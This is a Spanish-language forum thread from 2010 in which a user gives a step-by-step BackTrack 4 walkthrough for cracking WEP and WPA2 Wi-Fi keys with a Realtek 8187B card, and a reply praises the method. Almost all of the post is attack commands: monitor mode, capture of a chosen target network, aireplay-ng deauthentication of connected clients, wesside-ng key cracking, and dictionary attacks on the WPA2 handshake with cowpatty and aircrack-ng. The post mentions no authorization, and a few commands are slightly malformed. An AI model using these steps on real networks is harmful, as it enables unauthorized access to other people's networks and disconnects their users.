Realtek8187B clave WEP Y WPA2 con BT4

Iniciado por kriztianxxx, 28 Junio 2010, 00:51 AM

0 Miembros y 1 Visitante están viendo este tema.

kriztianxxx

Hola estimados amigos. Hago este post para confirmar ell funcionamiento respecto a auditorias con chipset nuevo de Realtek8187B y BackTrack 4
Despues de varias semanas sentado frente a mi computadora tratando de lograr obtener las preciadas claves de seguridad wireless encontre una manera para este chipset, esto no es una novedad, o quizas para muchos si, lo unico que pretendo es demostrar que si funciona nada mas y acepto cualquier comentario o critica, porque no soy un experto en el tema, pero ya con el tiempo estoy avanzando de a poco con los conocimientos.
Estas maneras de conseguir las claves seguro que las han visto en algun video de Youtub.
Aca les detallo de manera minuciosa los pasos:


Clave WEP:

Levantar interfaz inalambrica en modo Monitor en mi realtek8187b es asi.. Puede variar segun la marca y distribucion de linux.
iwconfig wlan0 mode monitor
airmon-ng start wlan0 ------>levanta una interfaz paralela que se llamara seguramente (mon0)

Luego escaneo con la placa inalambrica en modo monitor
airodump-ng mon0 -----> Notese que puse mon0 y no wlan0. A mi me funciono con mon0
Selecciono la red que voy a crackear y tomo todos los datos (bssid,essid,channel)
Cuando la haya elegido detenemos en airodump-ng con crtl+c y ponemos:
airodump-ng -w nombrearchivo -c numero de canal --bssid xx:xx:xx:Xx:xx:xx mon0
-nombre de archivo: puede ser cualquier nombre, pueden utilizar el mismo nombre ESSID
-c: es el numero del canal ej: 8
--bssid: es la MAC del ap  ej: 00:e0:2e:11:22:33

Luego abrimos otra ventana (Shell console)
iwconfig wlan0 channel 8  ------> Numero que coresponda al canal
iwconfig wlan0 rate auto   ------> Esto es por seguridad para que se adapte a cualquier velocidad.

Luego en la misma ventana hacemos un ataque de desautentificaion a un cliente conectado. De no tener uno, esperar a que aparezca jejej. Lo hacemos asi:
aireplay-ng -0 1 -a bssid -c  cliente mon0
-bssid: es la mac del AP
-cliente: es la mac de un cliente.
Notese que en la ventana del airodump-ng el numero de #DATA tiene que empezar a correr mas rapido.
Luego en otra ventana (shell console)
Aca esta usaremos la utilidad wesside-ng. Se usa asi
wesside-ng -i mon0
Esto acelera los #DATA aun mas y Crackea a la vez. Tendremos que esperar algunos minutos, en mi caso en todo el proceso tardé unos 15 minutos.
El wesside-ng te dara la clave en hex.

Luego para conectar a la red si es que quieres probar tienes que hacer lo sgte:
Primero cambiar el mode de funcionamiento de la placa ianlambrica, recuerda que esta en modo monitor.
airmon-ng stop mon0
ifconfig wlan0 down
iwconfig mode managed
ifconfig wlan0 up

Luego tratamos de conectarnos asi:
iwconfig wlan0 essid (nombre de la red) ap (mac del AP) channel (numero de canal) key (clave en hex)
Si tuvieses de alguna manera la clave en ascii creo que tienes que usar------> key s: (clave ascii)
Otra manera sencilla en BACKTRACK 4 seria:
wicd ----> esto activa la funcion grafica de redes.

CLAVE WPA2
Los pasos son iguales a los anteriores, a diferencia que no usaremos el wesside-ng, a cambio de este usaremos las utilidades aircrack-ng y cowpatty.
Destaco que para obtener este tipo de clave es fundamental tener una buena recepcion del AP con nuestra placa de red y que ese AP tenga clientes asociados. De no ser asi no podremos obtener el preciado HANDSHAKE .
En BackTrack 4 la forma es la siguiente:

En una  shell console
cd /pentest/wireless/cowpatty + ENTER  -----> esto se puede copiar y pegar
./cowpatty -r /root/nombre del archivo-01.cap -f dict -s Nombre de la red

En otra shell console
cd /pentest/wireless/aircrack-ng/test + ENTER  ---------->esto se puede copiar y pegar
aircrack-ng -w password.lst /root/nombre del archivo-01.cap


Fuente: http://www.youtube.com/watch?v=OGvCOV6Nh7A
Bueno espero que les sirva, como dije antes acepto cualquier comentario bye
Cristian de Mendoza Argentina




Sh4k4

si tambien ayuda!! metodo clasico con el wess a mi personalmete me gusta usar mas dispositivos wifi lanzando mas ataques!! y funciona!!